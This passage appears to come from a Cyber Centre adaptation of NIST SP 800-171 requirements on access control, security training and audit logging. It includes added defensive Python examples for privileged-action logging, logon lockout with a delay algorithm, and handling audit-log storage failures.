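        return set().union(*(ROLE_PERMISSIONS[r] for r in self.assignments.get(user, ())))

    def is_authorized(self, user: str, action: str) -> bool:
        return action in self.permissions(user)

    def execute(self, user: str, action: str, fn: Callable, *args):
        """Access enforcement at the point of use: decide, record, then run or refuse."""
        privileged = action in PRIVILEGED_FUNCTIONS
        allowed = self.is_authorized(user, action)
        self.audit_log.append({"user": user, "action": action,
                               "privileged": privileged,
                               "outcome": "allowed" if allowed else "denied"})
        if not allowed:
            raise PolicyViolation(f"{user} is not authorized for {action}")
        return fn(*args)

    def privileged_activity(self) -> list[dict]:
        """The records a detection pipeline would consume for 03.01.07 (b)."""
        return [r for r in self.audit_log if r["privileged"]]
```

The audit record is written before the function runs and regardless of outcome, so a denied attempt by a non-privileged user leaves the same kind of trace as a successful privileged action; both are what the discussion's "detect such misuse" relies on.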
Logging the use of privileged functions is one way to detect such misuse and mitigate the risks from advanced persistent threats and insider threats.</p> <h5>References</h5> <p>Source controls: AC-06(09), AC-06(10)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-08">03.01.08 Unsuccessful logon attempts</h4> </summary><ol class="lst-upr-alph"><li>Limit the number of consecutive invalid logon attempts to [Assignment: organization-defined number] in [Assignment: organization-defined time period].</li> <li>Automatically [Selection (one or more): lock the account or node for an [Assignment: organization-defined time period]; lock the account or node until released by an administrator; delay next logon prompt; notify system administrator; take other action] when the maximum number of unsuccessful attempts is exceeded.</li> </ol><h5>Discussion</h5> <p>Due to the potential for denial of service, automatic system lockouts are, in most cases, temporary and automatically release after a predetermined period established by the organization (i.e., using a delay algorithm). Organizations may employ different delay algorithms for different system components based on the capabilities of the respective components. 
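The lockout behaviour described here has two moving parts: a count of consecutive invalid attempts inside a time window, and a delay algorithm that releases the lock automatically so the control cannot be turned into a denial of service. The following is an added example, not part of the Cyber Centre text or of any product, implementing both with a sliding window and a capped exponential delay. The numeric values are constructed stand-ins for the organization-defined assignments, and the clock is injected so the logic can be exercised offline.

```python
# Added example, not part of the Cyber Centre text: the lockout behaviour 03.01.08
# describes, with a sliding window for "N invalid attempts in T" and a capped
# exponential delay algorithm so that every lock releases on its own. Numeric values
# are constructed stand-ins for the organization-defined assignments.
from collections import deque
from dataclasses import dataclass, field
from typing import Callable


@dataclass
class LockoutPolicy:
    max_attempts: int = 5          # [Assignment: organization-defined number] (constructed)
    window_seconds: int = 900      # [Assignment: organization-defined time period] (constructed)
    base_lock_seconds: int = 60    # duration of the first automatic lock (constructed)
    max_lock_seconds: int = 3600   # cap: repeated locks never exceed this (constructed)


@dataclass
class AccountState:
    failures: deque = field(default_factory=deque)  # timestamps of recent invalid attempts
    locked_until: float = 0.0
    lockouts: int = 0              # consecutive locks; drives the delay algorithm


class LogonGuard:
    def __init__(self, policy: LockoutPolicy, clock: Callable[[], float]):
        self.policy = policy
        self.clock = clock                         # injected time source
        self.accounts: dict[str, AccountState] = {}
        self.audit: list[str] = []

    def _state(self, account: str) -> AccountState:
        return self.accounts.setdefault(account, AccountState())

    def lock_remaining(self, account: str) -> float:
        return max(0.0, self._state(account).locked_until - self.clock())

    def is_locked(self, account: str) -> bool:
        return self.lock_remaining(account) > 0

    def attempt(self, account: str, credential_ok: bool) -> str:
        """Record one logon attempt and return "ok", "invalid" or "locked".

        The lock is checked before the credential result is consulted, so a locked
        account answers identically whether or not the password was right."""
        now = self.clock()
        st = self._state(account)
        if now < st.locked_until:
            return "locked"
        if credential_ok:
            st.failures.clear()
            st.lockouts = 0
            return "ok"
        # Drop failures that have aged out of the window, then count this one.
        while st.failures and now - st.failures[0] > self.policy.window_seconds:
            st.failures.popleft()
        st.failures.append(now)
        if len(st.failures) <= self.policy.max_attempts:
            return "invalid"
        # Limit exceeded. A quiet period since the last lock restarts the escalation.
        if st.lockouts and now - st.locked_until > self.policy.window_seconds:
            st.lockouts = 0
        delay = min(self.policy.base_lock_seconds * 2 ** st.lockouts,
                    self.policy.max_lock_seconds)
        st.lockouts += 1
        st.locked_until = now + delay
        st.failures.clear()
        self.audit.append(f"{account}: locked for {delay}s after exceeding "
                          f"{self.policy.max_attempts} invalid attempts in "
                          f"{self.policy.window_seconds}s")
        return "locked"
```

Each lock doubles the previous one up to the cap, which is the delay algorithm the discussion refers to; the cap and the reset after a quiet period are what keep a stream of deliberate bad attempts against someone else's account from locking it indefinitely.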
Responses to unsuccessful system logon attempts may be implemented at the system and application levels.</p> <p>Organization-defined actions that may be taken include prompting the user to answer a secret question in addition to the username and password, invoking a lockdown mode with limited user capabilities (instead of a full lockout), allowing users to log on only from specified Internet Protocol (IP) addresses, requiring a CAPTCHA to prevent automated attacks, or applying user profiles, such as location, time of day, IP address, device, or Media Access Control (MAC) address.</p> <h5>References</h5> <p>Source control: AC-07<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> </ul></details><details><summary><h4 id="03-01-09">03.01.09 System use notification</h4> </summary><p>Display a system use notification message with privacy and security notices consistent with applicable specified information rules before granting access to the system.</p> <h5>Discussion</h5> <p>System use notifications can be implemented using warning or banner messages. The messages are displayed before individuals log in to the system. System use notifications are used for access via logon interfaces with human users and are not required when human interfaces do not exist. Organizations consider whether a secondary use notification is needed to access applications or other system resources after the initial network logon. Posters or other printed materials may be used in lieu of an automated system message. 
This requirement is related to <a href="#03-15-03">Rules of behaviour 03.15.03</a>.</p> <h5>References</h5> <p>Source control: AC-08<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-10">03.01.10 Device lock</h4> </summary><ol class="lst-upr-alph"><li>Prevent access to the system by [Selection (one or more): initiating a device lock after [Assignment: organization-defined time period] of inactivity; requiring the user to initiate a device lock before leaving the system unattended].</li> <li>Retain the device lock until the user re-establishes access using established identification and authentication procedures.</li> <li>Conceal, via the device lock, information previously visible on the display with a publicly viewable image.</li> </ol><h5>Discussion</h5> <p>Device locks are temporary actions taken to prevent access to the system when users depart from the immediate vicinity of the system but do not want to log out because of the temporary nature of their absences. Device locks can be implemented at the operating system level or application level. User-initiated device locking is behaviour- or policy-based and requires users to take physical action to initiate the device lock. Device locks are not an acceptable substitute for logging out of the system (e.g., when organizations require users to log out at the end of workdays). 
Publicly viewable images can include static or dynamic images, such as patterns used with screen savers, photographic images, solid colors, a clock, a battery life indicator, or a blank screen with the caveat that specified information is not displayed.</p> <h5>References</h5> <p>Source controls: AC-11, AC-11(01)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-11">03.01.11 Session termination</h4> </summary><p>Terminate a user session automatically after [Assignment: organization-defined conditions or trigger events requiring session disconnect].</p> <h5>Discussion</h5> <p>This requirement addresses the termination of user-initiated logical sessions in contrast to the termination of network connections that are associated with communications sessions (i.e., disconnecting from the network) in <a href="#03-13-09">Network disconnect 03.13.09</a>. A logical session is initiated whenever a user (or processes acting on behalf of a user) accesses a system. Logical sessions can be terminated (and thus terminate user access) without terminating network sessions. Session termination ends all system processes associated with a user’s logical session except those processes that are created by the user (i.e., session owner) to continue after the session is terminated. 
Conditions or trigger events that require automatic session termination can include organization-defined periods of user inactivity, time-of-day restrictions on system use, and targeted responses to certain types of incidents.</p> <h5>References</h5> <p>Source control: AC-12<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-12">03.01.12 Remote access</h4> </summary><ol class="lst-upr-alph"><li>Establish usage restrictions, configuration requirements, and connection requirements for each type of allowable remote system access.</li> <li>Authorize each type of remote system access prior to establishing such connections.</li> <li>Route remote access to the system through authorized and managed access control points.</li> <li>Authorize remote execution of privileged commands and remote access to security-relevant information.</li> </ol><h5>Discussion</h5> <p>Remote access is access to systems (or processes acting on behalf of users) that communicate through external networks, such as the Internet. Monitoring and controlling remote access methods allows organizations to detect attacks and ensure compliance with remote access policies. Routing remote access through managed access control points enhances explicit control over such connections and reduces susceptibility to unauthorized access to the system, which could result in the unauthorized disclosure of specified information.</p> <p>Remote access to the system represents a significant potential vulnerability that can be exploited by adversaries. Restricting the execution of privileged commands and access to security-relevant information via remote access reduces the exposure of the organization and its susceptibility to threats by adversaries. A privileged command is a human-initiated command executed on a system that involves the control, monitoring, or administration of the system, including security functions and security-relevant information. 
Security-relevant information is information that can potentially impact the operation of security functions or the provision of security services in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data. Privileged commands give individuals the ability to execute sensitive, security-critical, or security-relevant system functions.</p> <h5>References</h5> <p>Source controls: AC-17, AC-17(03), AC-17(04)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/113/final">NIST SP 800-113 Guide to SSL <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/121/r2/upd1/final">NIST SP 800-121 Guide to Bluetooth Security</a></li> </ul></details><h4 id="03-01-13">03.01.13 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-01-14">03.01.14 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-01-15">03.01.15 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-16">03.01.16 Wireless access</h4> </summary><ol class="lst-upr-alph"><li>Establish usage restrictions, configuration requirements, and connection requirements for each type of wireless access to the system</li> <li>Authorize each type of wireless access to the system prior to 
establishing such connections</li> <li>Disable, when not intended for use, wireless networking capabilities prior to issuance and deployment</li> <li>Protect wireless access to the system using authentication and encryption</li> </ol><h5>Discussion</h5> <p>Wireless networking capabilities represent a significant potential vulnerability that can be exploited by adversaries. Establishing usage restrictions, configuration requirements, and connection requirements for wireless access to the system provides criteria to support access authorization decisions. These restrictions and requirements reduce susceptibility to unauthorized system access through wireless technologies. Wireless networks use authentication protocols that provide credential protection and mutual authentication. Organizations authenticate individuals and devices to protect wireless access to the system. Special attention is given to the variety of devices with potential wireless access to the system, including small form factor mobile devices (e.g., smart phones, tablets, smart watches). Wireless networking capabilities that are embedded within system components represent a significant potential vulnerability that can be exploited by adversaries. 
Strong authentication of users and devices, strong encryption, and disabling wireless capabilities that are not needed for essential missions or business functions can reduce susceptibility to threats by adversaries involving wireless technologies.</p> <h5>References</h5> <p>Source controls: AC-18, AC-18(01), AC-18(03)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/security-requirements-wireless-local-area-networks-itsg-41">Cyber Centre Security Requirements for Wireless Local Area Networks (ITSG-41) </a></li> <li><a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/94/final">NIST SP 800-94 Guide to Intrusion Detection and Prevention Systems (IDPS) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> </ul></details><h4 id="03-01-17">03.01.17 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-18">03.01.18 Access control for mobile devices</h4> </summary><ol class="lst-upr-alph"><li>Establish usage restrictions, configuration requirements, and connection requirements for mobile devices</li> <li>Authorize the connection of mobile devices to the system</li> <li>Implement full-device or container-based encryption to protect the confidentiality of specified information on mobile devices</li> </ol><h5>Discussion</h5> <p>A mobile device is a computing device that has a small form factor such that it can easily be carried by a single individual; is designed to operate without a physical connection; possesses local, non-removable, or removable data storage; and includes a self-contained power source. 
Mobile device functionality may also include voice communication capabilities, on-board sensors that allow the device to capture information, and/or built-in features for synchronizing local data with remote locations. Examples include smart phones, smart watches, and tablets. Mobile devices are typically associated with a single individual. The processing, storage, and transmission capabilities of mobile devices may be comparable to or a subset of notebook or desktop systems, depending on the nature and intended purpose of the device. The protection and control of mobile devices are behaviour- or policy-based and require users to take physical action to protect and control such devices when outside of controlled areas. Controlled areas are spaces for which the organization provides physical or procedural controls to meet the requirements established for protecting specified information.</p> <p>Due to the large variety of mobile devices with different characteristics and capabilities, organizational restrictions may vary for the different classes or types of such devices. Usage restrictions, configuration requirements, and connection requirements for mobile devices include configuration management, device identification and authentication, implementing mandatory protective software, scanning devices for malicious code, updating virus protection software, scanning for critical software updates and patches, conducting primary operating system and possibly other software integrity checks, and disabling unnecessary hardware. On mobile devices, secure containers provide software-based data isolation designed to segment enterprise applications and information from personal apps and data. Containers may present multiple user interfaces, one of the most common being a mobile application that acts as a portal to a suite of business productivity apps, such as email, contacts, and calendar. 
Organizations can employ full-device encryption or container-based encryption to protect the confidentiality of specified information on mobile devices.</p> <h5>References</h5> <p>Source controls: AC-19, AC-19(05)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security </a></li> </ul></details><h4 id="03-01-19">03.01.19 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-20">03.01.20 Use of external systems</h4> </summary><ol class="lst-upr-alph"><li>Prohibit the use of external systems unless they are specifically authorized</li> <li>Establish the following terms, conditions, and security requirements to be satisfied on external systems prior to allowing use of or access to those systems by authorized individuals: [Assignment: organization-defined security requirements]</li> <li>Permit authorized individuals to use an external system to access the organization’s system or to process, store, or transmit specified information only after: <ol><li>verifying that the security requirements on the external system as specified in the organization’s system security and privacy plans have been satisfied</li> <li>retaining approved system connection or processing agreements with the organizational entities hosting the external systems</li> </ol></li> <li>Restrict the use of organization-controlled portable storage devices by authorized individuals on external systems</li> </ol><h5>Discussion</h5> <p>External systems are systems that 
are used by but are not part of the organization. These systems include personally owned systems, system components, or devices; privately owned computing and communication devices in commercial or public facilities; systems owned or controlled by non-federal organizations; and systems managed by contractors. Organizations have the option to prohibit the use of any type of external system or specified types of external systems (e.g., prohibit the use of external systems that are not organization-owned). Terms and conditions are consistent with the trust relationships established with the entities that own, operate, or maintain external systems and include descriptions of shared responsibilities.</p> <p>Authorized individuals include organizational personnel, contractors, or other individuals with authorized access to the organizational system and over whom the organization has the authority to impose specific rules of behaviour regarding system access. Restrictions that organizations impose on authorized individuals may vary depending on the trust relationships between the organization and external entities. Organizations need assurance that the external systems satisfy the necessary security requirements so as not to compromise, damage, or harm the system. 
This requirement is related to <a href="#03-16-03">External system services 03.16.03</a>.</p> <h5>References</h5> <p>Source controls: AC-20, AC-20(01), AC-20(02)<br /> Supporting publications: None</p> </details><h4 id="03-01-21">03.01.21 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-01-22">03.01.22 Publicly accessible content</h4> </summary><ol class="lst-upr-alph"><li>Train authorized individuals to ensure that publicly accessible information does not contain specified information</li> <li>Review the content on publicly accessible systems for specified information periodically and remove such information, if discovered</li> </ol><h5>Discussion</h5> <p>In accordance with applicable laws, Orders in Council, directives, policies, regulations, standards, and guidelines, the public is not authorized to have access to non-public information, including specified information.</p> <h5>References</h5> <p>Source control: AC-22<br /> Supporting publications: None</p> </details></section><section><h3 class="h2 mrgn-tp-lg" id="3-2">3.2 Awareness and training</h3> <p>The Awareness and training controls deal with the education of users with respect to the security of the system.</p> <details><summary><h4 id="03-02-01">03.02.01 Literacy training and awareness</h4> </summary><ol class="lst-upr-alph"><li>Provide security and privacy literacy training to 
system users: <ol><li>as part of initial training for new users and [Assignment: organization-defined frequency] thereafter</li> <li>when required by system changes or following [Assignment: organization-defined events]</li> <li>on recognizing and reporting indicators of insider threat, social engineering, and social mining</li> </ol></li> <li>Update security and privacy literacy training content [Assignment: organization-defined frequency] and following [Assignment: organization-defined events]</li> </ol><h5>Discussion</h5> <p>Organizations provide basic and advanced levels of security and privacy literacy training to system users (including managers, senior executives, system administrators, and contractors) and measures to test the knowledge level of users. Organizations determine the content of literacy training based on specific organizational requirements, the systems to which personnel have authorized access, and work environments (e.g., telework). The content includes an understanding of the need for security and the actions required of users to maintain security and to respond to incidents. The content also addresses the need for operations security and the handling of specified information.</p> <p>Security and privacy awareness techniques include displaying posters, offering supplies inscribed with security reminders, displaying logon screen messages, generating email advisories or notices from organizational officials, and conducting awareness events using podcasts, videos, and webinars. Security and privacy literacy training is conducted at a frequency consistent with applicable laws, directives, regulations, and policies. Updating literacy training content on a regular basis ensures that the content remains relevant. 
Events that may precipitate an update to literacy training content include assessment or audit findings, security incidents or breaches, or changes in applicable laws, Orders in Council, directives, regulations, policies, standards, and guidelines.</p> <p>Potential indicators and possible precursors of insider threats include behaviours such as inordinate, long-term job dissatisfaction; attempts to gain access to information that is not required for job performance; unexplained access to financial resources; sexual harassment or bullying of fellow employees; workplace violence; and other serious violations of the policies, procedures, rules, directives, or practices of organizations. Organizations may consider tailoring insider threat awareness topics to the role (e.g., training for managers may be focused on specific changes in the behaviour of team members, while training for employees may be focused on more general observations).</p> <p>Social engineering is an attempt to deceive an individual into revealing information or taking an action that can be used to breach, compromise, or otherwise adversely impact a system. Social engineering includes phishing, pretexting, impersonation, baiting, quid pro quo, threadjacking, social media exploitation, and tailgating. Social mining is an attempt to gather information about the organization that may be used to support future attacks. 
Security and privacy literacy training includes how to communicate employee and management concerns regarding potential indicators of insider threat and potential and actual instances of social engineering and data mining through appropriate organizational channels in accordance with established policies and procedures.</p> <h5>References</h5> <p>Source controls: AT-02, AT-02(02), AT-02(03)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/offer-tailored-cyber-security-training-your-employees-itsap10093">Cyber Centre Offer tailored cyber security training to your employees (ITSAP.10.093) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v2/r1/final">NIST SP 800-160-2 Developing Cyber-Resilient Systems: A Systems Security Engineering Approach </a></li> </ul></details><details><summary><h4 id="03-02-02">03.02.02 Role-based training</h4> </summary><ol class="lst-upr-alph"><li>Provide role-based security and privacy training to organizational personnel: <ol><li>before authorizing access to the system or specified information, before performing assigned duties, and [Assignment: organization-defined frequency] thereafter</li> <li>when required by system changes or following [Assignment: organization-defined events]</li> </ol></li> <li>Update role-based training content [Assignment: organization-defined frequency] and following [Assignment: organization-defined events]</li> </ol><h5>Discussion</h5> <p>Organizations determine the content and frequency of security and privacy training based on the assigned duties, roles, and responsibilities of individuals and the security and privacy requirements of the systems to which personnel have authorized access. 
In addition, organizations provide system developers, enterprise architects, security architects, privacy officers, software developers, systems integrators, acquisition/procurement officials, system and network administrators, personnel conducting configuration management and auditing activities, personnel performing independent verification and validation, security assessors, and personnel with access to system-level software with security-related technical training specifically tailored for their assigned duties.</p> <p>Comprehensive role-based training addresses management, operational, and technical roles and responsibilities that cover physical, personnel, and technical controls. Such training can include policies, procedures, tools, and artifacts for the security and privacy roles defined. Organizations also provide the training necessary for individuals to carry out their responsibilities related to operations and supply chain security within the context of organizational information security programs.</p> <h5>References</h5> <p>Source control: AT-03<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/181/r1/final">NIST SP 800-181 Workforce Framework for Cybersecurity (NICE Framework) </a></li> </ul></details><h4 id="03-02-03">03.02.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> </section> <section><h3 class="h2 mrgn-tp-lg" id="3-3">3.3 Audit and accountability</h3> <p>The Audit and accountability controls support the ability to 
collect, analyze, and store audit records associated with user operations performed within the system.</p> <details><summary><h4 id="03-03-01">03.03.01 Event logging</h4> </summary><ol class="lst-upr-alph"><li>Specify the following event types selected for logging within the system: [Assignment: organization-defined event types]</li> <li>Review and update the event types selected for logging [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>An event is any observable occurrence in a system, including unlawful or unauthorized system activity. Organizations identify event types for which a logging functionality is needed. This includes events that are relevant to the security of systems, the privacy of individuals, and the environments in which those systems operate to meet specific and ongoing auditing needs. Event types can include password changes, the execution of privileged functions, failed logons or accesses related to systems, administrative privilege usage, or third-party credential usage. In determining event types that require logging, organizations consider the system monitoring and auditing that are appropriate for each of the security requirements. 
When defining event types, organizations consider the logging necessary to cover related events, such as the steps in distributed, transaction-based processes (e.g., processes that are distributed across multiple organizations) and actions that occur in service-oriented or cloud-based architectures.</p> <p>Monitoring and auditing requirements can be balanced with other system needs. For example, organizations may determine that systems must have the capability to log every file access, both successful and unsuccessful, but only activate that capability under specific circumstances due to the potential burden on system performance. The event types that are logged by organizations may change over time. Reviewing and updating the set of logged event types is necessary to ensure that the current set remains relevant.</p> <h5>References</h5> <p>Source control: AU-02<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/network-security-logging-monitoring-itsap80085">Cyber Centre Network security logging and monitoring (ITSAP.80.085) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/92/final">NIST SP 800-92 Guide to Computer Security Log Management </a></li> </ul></details><details><summary><h4 id="03-03-02">03.03.02 Audit record content</h4> </summary><ol class="lst-upr-alph"><li>Include the following content in audit records: <ol><li>what type of event occurred</li> <li>when the event occurred</li> <li>where the event occurred</li> <li>source of the event</li> <li>outcome of the event</li> <li>identity of individuals, subjects, objects, or entities associated with the event</li> </ol></li> <li>Provide additional information for audit records, as needed</li> </ol><h5>Discussion</h5> <p>Audit record content that may be necessary to support the auditing function includes time stamps, source and destination addresses, user or process identifiers, event descriptions, file names, and the access control or flow control rules that are invoked. 
Event outcomes can include indicators of event success or failure and event-specific results (e.g., the security state of the system after the event occurred). Detailed information that organizations may consider in audit records may include a full text recording of privileged commands or the individual identities of group account users.</p> <h5>References</h5> <p>Source controls: AU-03, AU-03(01)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-03">03.03.03 Audit record generation</h4> </summary><ol class="lst-upr-alph"><li>Generate audit records for the selected event types and audit record content specified in <a href="#03-03-01">Event logging 03.03.01</a> and <a href="#03-03-02">Audit record content 03.03.02</a></li> <li>Retain audit records for a time period consistent with records retention policy</li> </ol><h5>Discussion</h5> <p>Audit records can be generated at various levels of abstraction, including at the packet level as information traverses the network. Selecting the appropriate level of abstraction is a critical aspect of an audit logging capability and can facilitate the identification of root causes to problems. The ability to add information generated in audit records is dependent on system functionality to configure the audit record content. Organizations may consider additional information in audit records, including the access control or flow control rules invoked and the individual identities of group account users. Organizations may also consider limiting additional audit record information to only information that is explicitly needed for audit requirements. 
If records generated for the audit process contain personal information that is not required for the audit process, that personal information should be removed or redacted prior to retention.</p> <p>If audit records rely on personal information and that information is used to make an administrative decision, the minimum retention standard is at least two years following the last time the personal information was used for an administrative purpose unless the individual consents to its disposal.</p> <h5>References</h5> <p>Source controls: AU-11, AU-12<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/92/final">NIST SP 800-92 Guide to Computer Security Log Management</a></p> </details><details><summary><h4 id="03-03-04">03.03.04 Response to audit logging process failures</h4> </summary><ol class="lst-upr-alph"><li>Alert organizational personnel or roles within [Assignment: organization-defined time period] in the event of an audit logging process failure</li> <li>Take the following additional actions: [Assignment: organization-defined additional actions]</li> </ol><h5>Discussion</h5> <p>Audit logging process failures include software and hardware errors, failures in audit log capturing mechanisms, and reaching or exceeding audit log storage capacity. Response actions include overwriting the oldest audit records, shutting down the system, and stopping the generation of audit records. Organizations may choose to define additional actions for audit logging process failures based on the type, location, and severity of the failure, or a combination of such factors. When the audit logging process failure is related to storage, the response is carried out for the audit log storage repository (i.e., the distinct system component where the audit logs are stored), the system on which the audit logs reside, the total audit log storage capacity of the organization (i.e., all audit log storage repositories combined), or all three. 
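</p> <p>The following is an added example, not Cyber Centre or NIST code: a Python audit sink that treats reaching storage capacity as an audit logging process failure, alerts a designated role once and measures that alert against the organization-defined time period (item a), then applies one of the additional actions named in the discussion above, overwriting the oldest records, stopping record generation, or shutting down (item b). The capacity, the ticking clock, the record strings and the policy names are assumptions made for the example.</p>

```python
"""Response to audit logging process failures (added example, not Cyber Centre code).

A bounded audit sink that treats reaching storage capacity as an audit
logging process failure: it alerts once, measures that alert against the
organization-defined window, then applies the configured action.
Capacity, clock, policy names and records are constructed for the example.
"""
from collections import deque
from dataclasses import dataclass
from typing import Callable, Deque, List


class AuditLogShutdown(RuntimeError):
    """Policy 'shutdown': the caller must treat this as fatal and halt."""


@dataclass
class Alert:
    raised_at: float      # seconds on the constructed clock
    latency: float        # seconds from detecting the failure to notifying
    within_window: bool   # latency <= organization-defined time period
    reason: str


class TickingClock:
    """Constructed clock: every read advances one second, so runs are deterministic."""

    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        self.now += 1.0
        return self.now


class AuditSink:
    POLICIES = ("overwrite_oldest", "stop_logging", "shutdown")

    def __init__(self, capacity: int, policy: str, alert_window: float,
                 notify: Callable[[Alert], None], clock: Callable[[], float]) -> None:
        if policy not in self.POLICIES:
            raise ValueError(f"unknown failure policy {policy!r}")
        self.capacity, self.policy, self.alert_window = capacity, policy, alert_window
        self._notify, self._clock = notify, clock
        self.records: Deque[str] = deque()
        self.alerts: List[Alert] = []
        self.stopped = False
        self.overwritten = 0
        self.suppressed = 0

    def _alert_once(self, reason: str) -> None:
        """Item a: alert designated personnel when the failure is detected."""
        if self.alerts:
            return                          # one alert per failure, not one per record
        detected = self._clock()
        raised = self._clock()              # second read stands in for the notification path's delay
        alert = Alert(raised, raised - detected, raised - detected <= self.alert_window, reason)
        self._notify(alert)
        self.alerts.append(alert)

    def write(self, record: str) -> bool:
        """Store a record; return False when the failure policy suppressed it."""
        if self.stopped:
            self.suppressed += 1
            return False
        if len(self.records) < self.capacity:
            self.records.append(record)
            return True
        self._alert_once(f"audit log storage capacity of {self.capacity} records reached")
        # Item b: the organization-defined additional action.
        if self.policy == "overwrite_oldest":   # availability over completeness of evidence
            self.records.popleft()
            self.records.append(record)
            self.overwritten += 1
            return True
        if self.policy == "stop_logging":       # keep existing evidence, lose new events
            self.stopped = True
            self.suppressed += 1
            return False
        raise AuditLogShutdown("audit log full; halting rather than running unaudited")


def run_scenario(policy: str, capacity: int = 3, events: int = 5) -> dict:
    """Drive a sink past capacity and summarize what happened."""
    notified: List[Alert] = []
    sink = AuditSink(capacity, policy, alert_window=5.0, notify=notified.append, clock=TickingClock())
    halted = False
    try:
        for i in range(events):
            sink.write(f"event-{i}")
    except AuditLogShutdown:
        halted = True
    return {
        "records": list(sink.records),
        "alerts": len(notified),
        "alert_within_window": all(a.within_window for a in notified),
        "overwritten": sink.overwritten,
        "suppressed": sink.suppressed,
        "halted": halted,
    }


if __name__ == "__main__":
    for policy in AuditSink.POLICIES:
        print(policy, run_scenario(policy))
```

<p>The three actions trade off differently: overwriting keeps the system running but discards the oldest evidence, stopping keeps existing evidence but leaves new activity unaudited, and shutting down is the only action that guarantees no unaudited activity at the cost of availability. Which one is acceptable, and for which repository, is the organization-defined decision this requirement asks for.</p> <p>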
Organizations may decide to take no additional actions after alerting designated roles or personnel.</p> <h5>References</h5> <p>Source control: AU-05<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-05">03.03.05 Audit record review, analysis, and reporting</h4> </summary><ol class="lst-upr-alph"><li>Review and analyze system audit records [Assignment: organization-defined frequency] for indications and potential impact of inappropriate or unusual activity</li> <li>Report findings to organizational personnel or roles</li> <li>Analyze and correlate audit records across different repositories to gain organization-wide situational awareness</li> </ol><h5>Discussion</h5> <p>Audit record review, analysis, and reporting cover information security- and privacy-related logging performed by organizations and can include logging that results from the monitoring of account usage, remote access, wireless connectivity, configuration settings, the use of maintenance tools and non-local maintenance, system component inventory, mobile device connection, equipment delivery and removal, physical access, temperature and humidity, communications at system interfaces, and the use of mobile code. Findings can be reported to organizational entities, such as the incident response team, help desk, and security or privacy offices. If organizations are prohibited from reviewing and analyzing audit records or unable to conduct such activities, the review or analysis may be carried out by other organizations granted such authority. The scope, frequency, and/or depth of the audit record review, analysis, and reporting may be adjusted to meet organizational needs based on new information received. 
